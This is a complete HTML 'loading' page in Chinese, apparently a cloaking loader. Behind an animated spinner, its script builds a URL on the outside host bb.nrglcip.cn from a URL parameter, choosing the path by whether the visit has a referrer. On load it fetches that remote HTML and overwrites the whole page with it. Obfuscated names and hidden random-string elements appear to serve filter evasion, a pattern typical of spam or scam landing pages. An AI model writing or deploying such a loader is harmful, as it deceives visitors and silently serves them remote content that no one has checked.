<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zEyFNl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zEyFNl .G6XlDDr5 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zEyFNl .content {
            line-height: 50px;
            text-align: center
        }

        .zEyFNl .img {
            width: 100%
        }

        .zEyFNl .jdL7chQukP {
            text-align: center
        }

        .zEyFNl .jdL7chQukP span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zEyFNl .jdL7chQukP span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zEyFNl .jdL7chQukP span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zEyFNl .jdL7chQukP span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zEyFNl .jdL7chQukP span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zEyFNl .jdL7chQukP span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zEyFNl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VUfE6VAJh0Sr(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var tSTEq = VUfE6VAJh0Sr('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ tSTEq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ tSTEq +".html?a=share";
		}
		
        eWgBhdWl=url+"#"+new Date().getTime();
        eWgBhdWl && function() {
            $.get(eWgBhdWl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>W8Y8Y7Hvn0WdzDjiWnOeK</p>
<p  style='display:none'>W8Y8Y7Hvn0WdzDjiWnOeK</p>
<ul style='display:none' >IdIgDWKxQ8R1zPBmqo5yhLYj4jMgd6dkzr4xYOxL6J1r4Kp8ow67U1fVn0gabc0rR</ul>
<a  href='#' style='display:none'>bJgox57JogHrddzxuNkYqkIJMCRU3lajkD9PI74t1BKb3vCaQUIE6mTMhlRe573KZJ4IPZw</a>
<img  src='' style='display:none'><div class="zEyFNl">
    <div class="G6XlDDr5">
        <div class="jdL7chQukP">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >CWNxnNKfUSqTeamn</ul>
<p  style='display:none'>qaaLB0ZVVrSEUWED7SRmbSbWAXMFpS5VbCiya7T1T</p>
<li style='display:none' >im7t0AHjIxjnLdS7RLrFnVGAasygATPlbjJSUDM0NiW8HUWD7iqTh9spJS00hgwZUzbBZic5qShPv2Vj207NWcgdlftMLm0OMAOlP</li></body>
</html>